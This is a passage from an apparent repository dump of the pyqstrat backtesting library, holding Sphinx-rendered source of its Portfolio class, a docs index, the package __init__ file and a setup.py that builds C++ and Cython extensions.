class=\"n\">all_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">all_timestamps</span><span class=\"p\">[(</span><span class=\"n\">all_timestamps</span> <span class=\"o\">&lt;=</span> <span class=\"n\">end_date</span><span class=\"p\">)]</span>\n \n <span class=\"n\">iterations</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n \n <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">:</span>\n <span class=\"n\">indices</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">searchsorted</span><span class=\"p\">(</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">all_timestamps</span><span class=\"p\">)</span>\n <span class=\"n\">iterations</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">strategy</span><span class=\"p\">,</span> <span class=\"n\">indices</span><span class=\"p\">))</span>\n <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">_generate_order_iterations</span><span class=\"p\">(</span><span class=\"n\">start_date</span><span class=\"o\">=</span><span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"o\">=</span><span class=\"n\">end_date</span><span class=\"p\">)</span>\n \n <span class=\"k\">return</span> <span class=\"n\">all_timestamps</span><span class=\"p\">,</span> <span class=\"n\">iterations</span>\n \n<div class=\"viewcode-block\" id=\"Portfolio.run_rules\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.run_rules\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">run_rules</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Run rules for the strategies specified. Must be called after run_indicators and run_signals. </span>\n<span class=\"sd\"> See run function for argument descriptions</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategy_names</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategy_names</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"s1\">&#39;a portfolio must have at least one strategy&#39;</span><span class=\"p\">)</span>\n\n <span class=\"n\">strategies</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">key</span><span class=\"p\">]</span> <span class=\"k\">for</span> <span class=\"n\">key</span> <span class=\"ow\">in</span> <span class=\"n\">strategy_names</span><span class=\"p\">]</span>\n \n <span class=\"n\">min_date</span> <span class=\"o\">=</span> <span class=\"nb\">min</span><span class=\"p\">([</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span> <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">])</span>\n <span class=\"k\">if</span> <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">min_date</span> <span class=\"o\">=</span> <span class=\"nb\">max</span><span class=\"p\">(</span><span class=\"n\">min_date</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">)</span>\n <span class=\"n\">max_date</span> <span class=\"o\">=</span> <span class=\"nb\">max</span><span class=\"p\">([</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">])</span>\n <span class=\"k\">if</span> <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">max_date</span> <span class=\"o\">=</span> <span class=\"nb\">min</span><span class=\"p\">(</span><span class=\"n\">max_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span>\n \n <span class=\"n\">_logger</span><span class=\"o\">.</span><span class=\"n\">info</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;generating order iterations: </span><span class=\"si\">{</span><span class=\"n\">start_date</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">end_date</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n \n <span class=\"n\">all_timestamps</span><span class=\"p\">,</span> <span class=\"n\">iterations</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_generate_order_iterations</span><span class=\"p\">(</span><span class=\"n\">strategies</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span>\n \n <span class=\"k\">for</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">all_timestamps</span><span class=\"p\">):</span>\n <span class=\"k\">for</span> <span class=\"p\">(</span><span class=\"n\">strategy</span><span class=\"p\">,</span> <span class=\"n\">indices</span><span class=\"p\">)</span> <span class=\"ow\">in</span> <span class=\"n\">iterations</span><span class=\"p\">:</span>\n <span class=\"c1\"># index into strategy timestamps</span>\n <span class=\"n\">idx</span> <span class=\"o\">=</span> <span class=\"n\">indices</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span>\n <span class=\"k\">if</span> <span class=\"n\">idx</span> <span class=\"o\">!=</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">)</span> <span class=\"ow\">and</span> <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"n\">idx</span><span class=\"p\">]</span> <span class=\"o\">==</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span>\n <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">_run_iteration</span><span class=\"p\">(</span><span class=\"n\">idx</span><span class=\"p\">)</span>\n \n <span class=\"c1\"># Make sure we calc to the end for each strategy</span>\n <span class=\"k\">for</span> <span class=\"n\">strategy</span> <span class=\"ow\">in</span> <span class=\"n\">strategies</span><span class=\"p\">:</span>\n <span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">account</span><span class=\"o\">.</span><span class=\"n\">calc</span><span class=\"p\">(</span><span class=\"n\">strategy</span><span class=\"o\">.</span><span class=\"n\">timestamps</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">])</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.run\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.run\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">run</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Run indicators, signals and rules.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> strategy_names: A list of strategy names. By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> start_date: Run rules starting from this date. </span>\n<span class=\"sd\"> Sometimes we have a few strategies in a portfolio that need different lead times before they are ready to trade</span>\n<span class=\"sd\"> so you can set this so they are all ready by this date. Default None</span>\n<span class=\"sd\"> end_date: Don&#39;t run rules after this date. Default None</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">run_indicators</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">run_signals</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">run_rules</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.df_returns\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.df_returns\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_returns</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">sampling_frequency</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;D&#39;</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Return dataframe containing equity and returns with a date index. Equity and returns are combined from all strategies passed in.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> sampling_frequency: Date frequency for rows. Default &#39;D&#39; for daily so we will have one row per day</span>\n<span class=\"sd\"> strategy_names: By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">strategy_names</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">strategy_names</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">strategy_names</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span> <span class=\"k\">raise</span> <span class=\"ne\">Exception</span><span class=\"p\">(</span><span class=\"s1\">&#39;portfolio must have at least one strategy&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">equity_list</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">strategy_names</span><span class=\"p\">:</span>\n <span class=\"n\">equity</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">df_returns</span><span class=\"p\">(</span><span class=\"n\">sampling_frequency</span><span class=\"o\">=</span><span class=\"n\">sampling_frequency</span><span class=\"p\">)[[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;equity&#39;</span><span class=\"p\">]]</span>\n <span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">columns</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">]</span>\n <span class=\"n\">equity</span> <span class=\"o\">=</span> <span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">set_index</span><span class=\"p\">(</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">equity_list</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">equity</span><span class=\"p\">)</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">concat</span><span class=\"p\">(</span><span class=\"n\">equity_list</span><span class=\"p\">,</span> <span class=\"n\">axis</span><span class=\"o\">=</span><span class=\"mi\">1</span><span class=\"p\">)</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;equity&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">sum</span><span class=\"p\">(</span><span class=\"n\">axis</span><span class=\"o\">=</span><span class=\"mi\">1</span><span class=\"p\">)</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;ret&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">pct_change</span><span class=\"p\">()</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">reset_index</span><span class=\"p\">()</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.evaluate_returns\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.evaluate_returns\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">evaluate_returns</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">sampling_frequency</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;D&#39;</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">plot</span><span class=\"p\">:</span> <span class=\"nb\">bool</span> <span class=\"o\">=</span> <span class=\"kc\">True</span><span class=\"p\">,</span> \n <span class=\"n\">float_precision</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"mi\">4</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns a dictionary of common return metrics.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> sampling_frequency: Date frequency. Default &#39;D&#39; for daily so we downsample to daily returns before computing metrics</span>\n<span class=\"sd\"> strategy_names: By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> plot: If set to True, display plots of equity, drawdowns and returns. Default False</span>\n<span class=\"sd\"> float_precision: Number of significant figures to show in returns. Default 4</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">returns</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">df_returns</span><span class=\"p\">(</span><span class=\"n\">sampling_frequency</span><span class=\"p\">,</span> <span class=\"n\">strategy_names</span><span class=\"p\">)</span>\n <span class=\"n\">ev</span> <span class=\"o\">=</span> <span class=\"n\">compute_return_metrics</span><span class=\"p\">(</span><span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">ret</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">])</span>\n <span class=\"n\">display_return_metrics</span><span class=\"p\">(</span><span class=\"n\">ev</span><span class=\"o\">.</span><span class=\"n\">metrics</span><span class=\"p\">(),</span> <span class=\"n\">float_precision</span><span class=\"o\">=</span><span class=\"n\">float_precision</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">plot</span><span class=\"p\">:</span> <span class=\"n\">plot_return_metrics</span><span class=\"p\">(</span><span class=\"n\">ev</span><span class=\"o\">.</span><span class=\"n\">metrics</span><span class=\"p\">())</span>\n <span class=\"k\">return</span> <span class=\"n\">ev</span><span class=\"o\">.</span><span class=\"n\">metrics</span><span class=\"p\">()</span></div>\n \n<div class=\"viewcode-block\" id=\"Portfolio.plot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.portfolio.Portfolio.plot\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">plot</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">sampling_frequency</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;D&#39;</span><span class=\"p\">,</span> \n <span class=\"n\">strategy_names</span><span class=\"p\">:</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Display plots of equity, drawdowns and returns</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> sampling_frequency: Date frequency. Default &#39;D&#39; for daily so we downsample to daily returns before computing metrics</span>\n<span class=\"sd\"> strategy_names: A list of strategy names. By default this is set to None and we use all strategies.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">returns</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">df_returns</span><span class=\"p\">(</span><span class=\"n\">sampling_frequency</span><span class=\"p\">,</span> <span class=\"n\">strategy_names</span><span class=\"p\">)</span>\n <span class=\"n\">timestamps</span> <span class=\"o\">=</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">timestamp</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"n\">ev</span> <span class=\"o\">=</span> <span class=\"n\">compute_return_metrics</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">ret</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">returns</span><span class=\"o\">.</span><span class=\"n\">equity</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">])</span>\n <span class=\"n\">plot_return_metrics</span><span class=\"p\">(</span><span class=\"n\">ev</span><span class=\"o\">.</span><span class=\"n\">metrics</span><span class=\"p\">())</span></div>\n \n <span class=\"k\">def</span> <span class=\"fm\">__repr__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">str</span><span class=\"p\">:</span>\n <span class=\"k\">return</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;</span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">strategies</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">()</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span></div>\n \n\n<span class=\"k\">if</span> <span class=\"vm\">__name__</span> <span class=\"o\">==</span> <span class=\"s2\">&quot;__main__&quot;</span><span class=\"p\">:</span>\n <span class=\"kn\">import</span> <span class=\"nn\">doctest</span>\n <span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">testmod</span><span class=\"p\">(</span><span class=\"n\">optionflags</span><span class=\"o\">=</span><span class=\"n\">doctest</span><span class=\"o\">.</span><span class=\"n\">NORMALIZE_WHITESPACE</span><span class=\"p\">)</span>\n<span class=\"c1\"># $$_end_code</span>\n</pre></div>\n\n </div>\n \n </div>\n </div>\n <div class=\"sphinxsidebar\" role=\"navigation\" aria-label=\"main navigation\">\n <div class=\"sphinxsidebarwrapper\">\n<h1 class=\"logo\"><a href=\"../../index.html\">pyqstrat</a></h1>\n\n\n\n\n\n\n\n\n<h3>Navigation</h3>\n<p class=\"caption\" role=\"heading\"><span class=\"caption-text\">Contents:</span></p>\n<ul>\n<li class=\"toctree-l1\"><a class=\"reference internal\" href=\"../../modules.html\">pyqstrat</a></li>\n</ul>\n\n<div class=\"relations\">\n<h3>Related Topics</h3>\n<ul>\n <li><a href=\"../../index.html\">Documentation overview</a><ul>\n <li><a href=\"../index.html\">Module code</a><ul>\n </ul></li>\n </ul></li>\n</ul>\n</div>\n<div id=\"searchbox\" style=\"display: none\" role=\"search\">\n <h3 id=\"searchlabel\">Quick search</h3>\n <div class=\"searchformwrapper\">\n <form class=\"search\" action=\"../../search.html\" method=\"get\">\n <input type=\"text\" name=\"q\" aria-labelledby=\"searchlabel\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\" spellcheck=\"false\"/>\n <input type=\"submit\" value=\"Go\" />\n </form>\n </div>\n</div>\n<script>document.getElementById('searchbox').style.display = \"block\"</script>\n\n\n\n\n\n\n\n\n </div>\n </div>\n <div class=\"clearer\"></div>\n </div>\n <div class=\"footer\">\n &copy;2018, Sal Abbasi.\n \n |\n Powered by <a href=\"http://sphinx-doc.org/\">Sphinx 5.1.1</a>\n &amp; <a href=\"https://github.com/bitprophet/alabaster\">Alabaster 0.7.12</a>\n \n </div>\n\n \n\n \n </body>\n</html>" }, { "alpha_fraction": 0.559440553188324, "alphanum_fraction": 0.5629370808601379, "avg_line_length": 15.823529243469238, "blob_id": "948502a960c752843d361c57f2d9a8b7c735fdae", "content_id": "50ad8ccbb33f3bc37c47814814526e6f22517201", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 286, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/docs/_sources/index.rst.txt", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "API documentation for pyqstrat\n====================================\n\nPlease read README.rst in the main directory to get started\n\n.. toctree::\n :maxdepth: 2\n :caption: Contents:\n\n modules\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n" }, { "alpha_fraction": 0.7966417670249939, "alphanum_fraction": 0.7985074520111084, "avg_line_length": 32.4375, "blob_id": "55e3e5e87db4f9a12e139b9c145486e9f6a97c7e", "content_id": "b26fb02585d319abe3eac5e57436bceb363e7df2", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 536, "license_type": "permissive", "max_line_length": 53, "num_lines": 16, "path": "/pyqstrat/__init__.py", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "# flake8: noqa\n# include functions for easy reference from pq prefix\nfrom pyqstrat.pq_utils import *\nfrom pyqstrat.pq_types import *\nfrom pyqstrat.pq_io import *\nfrom pyqstrat.holiday_calendars import *\nfrom pyqstrat.markets import *\nfrom pyqstrat.account import * \nfrom pyqstrat.strategy import *\nfrom pyqstrat.portfolio import *\nfrom pyqstrat.optimize import *\nfrom pyqstrat.plot import *\nfrom pyqstrat.interactive_plot import *\nfrom pyqstrat.evaluator import *\nfrom pyqstrat.pyqstrat_cpp import *\nfrom pyqstrat.pyqstrat_io import *\n\n" }, { "alpha_fraction": 0.5424058437347412, "alphanum_fraction": 0.5501822829246521, "avg_line_length": 41.86458206176758, "blob_id": "2cd2fa9af4d2e44fc98c9db927cbc4af23edb241", "content_id": "4c41c7c043ab4db61e968658fa1525f6aa83dcec", "detected_licenses": [ "BSD-3-Clause", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4115, "license_type": "permissive", "max_line_length": 126, "num_lines": 96, "path": "/setup.py", "repo_name": "abbass2/pyqstrat", "src_encoding": "UTF-8", "text": "import setuptools\nfrom Cython.Build import cythonize\nfrom distutils.core import setup, Extension\nimport numpy as np\nimport pybind11\nimport glob\nimport os\nimport sys\n\n\nif __name__ == '__main__':\n _conda_prefix = os.getenv('CONDA_PREFIX')\n _conda_prefix_1 = os.getenv('CONDA_PREFIX_1')\n if _conda_prefix is None and _conda_prefix_1 is None:\n raise RuntimeError(\"CONDA_PREFIX and CONDA_PREFIX_1 not found in env variables\")\n\n _windows = (sys.platform == \"win32\")\n\n conda_prefix = _conda_prefix if _conda_prefix else _conda_prefix_1\n pybind_11_include = [pybind11.get_include()]\n np_include = [np.get_include()]\n\n if sys.platform in [\"win32\", \"cygwin\"]:\n include_dirs = [f'{conda_prefix}/include',\n f'{conda_prefix}/Library/include']\n \n library_dirs = [f'{conda_prefix}/lib',\n f'{conda_prefix}/Library/lib',\n f'{conda_prefix}/bin',\n f'{conda_prefix}/Library/bin']\n else:\n include_dirs = [f'{conda_prefix}/lib'] \n library_dirs = [f'{conda_prefix}/lib']\n\n\n extra_compile_args=[] if _windows else ['-std=c++11', '-Ofast']\n cython_extra_compile_args=[] if _windows else ['-Wno-parentheses-equality', '-Wno-unreachable-code-fallthrough', '-Ofast']\n \n cpp_dir = 'pyqstrat/cpp'\n\n io_module = Extension('pyqstrat.pyqstrat_io',\n sources = [f'{cpp_dir}/io/{file}' for file in ['read_file.cpp', 'csv_reader.cpp']],\n include_dirs=include_dirs + np_include,\n library_dirs=library_dirs,\n libraries=['zip'],\n extra_compile_args=extra_compile_args)\n\n opt_cpp_files = glob.glob(f'{cpp_dir}/options/*.cpp') + glob.glob(f'{cpp_dir}/lets_be_rational/*.cpp')\n options_module = Extension('pyqstrat.pyqstrat_cpp',\n sources = opt_cpp_files,\n include_dirs=include_dirs + pybind_11_include,\n library_dirs=library_dirs,\n extra_compile_args=extra_compile_args)\n\n _compute_pnl_module = Extension('pyqstrat.compute_pnl',\n ['pyqstrat/compute_pnl.pyx'],\n include_dirs=np_include,\n extra_compile_args=cython_extra_compile_args,\n define_macros=[('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION')])\n compute_pnl_module = cythonize([_compute_pnl_module], compiler_directives={'language_level' : \"3\"})[0]\n \n with open('version.txt', 'r') as f:\n version = f.read().strip()\n\n with open('requirements.txt', 'r') as f:\n requirements = f.read().splitlines()\n\n with open('README.rst', 'r') as f:\n long_description=f.read()\n \n setup(name='pyqstrat',\n version=version,\n ext_modules = [io_module, options_module, compute_pnl_module],\n author_email='[email protected]',\n url='http://github.com/abbass2/pyqstrat/',\n license='BSD',\n python_requires='>=3.10',\n install_requires=requirements,\n description='fast / extensible library for backtesting quantitative strategies',\n long_description=long_description,\n packages=['pyqstrat'],\n include_package_data=True,\n platforms='any',\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Natural Language :: English',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: Libraries :: Application Frameworks',\n 'Topic :: Office/Business :: Financial :: Investment',\n 'Programming Language :: Python :: 3.10',\n 'Programming Language :: Python :: 3 :: Only',\n ],\n zip_safe = False)\n" }, { "alpha_fraction": 0.4231995940208435, "alphanum_fraction": 0.624139666557312, "avg_line_length": 39.79452133178711, "blob_id": 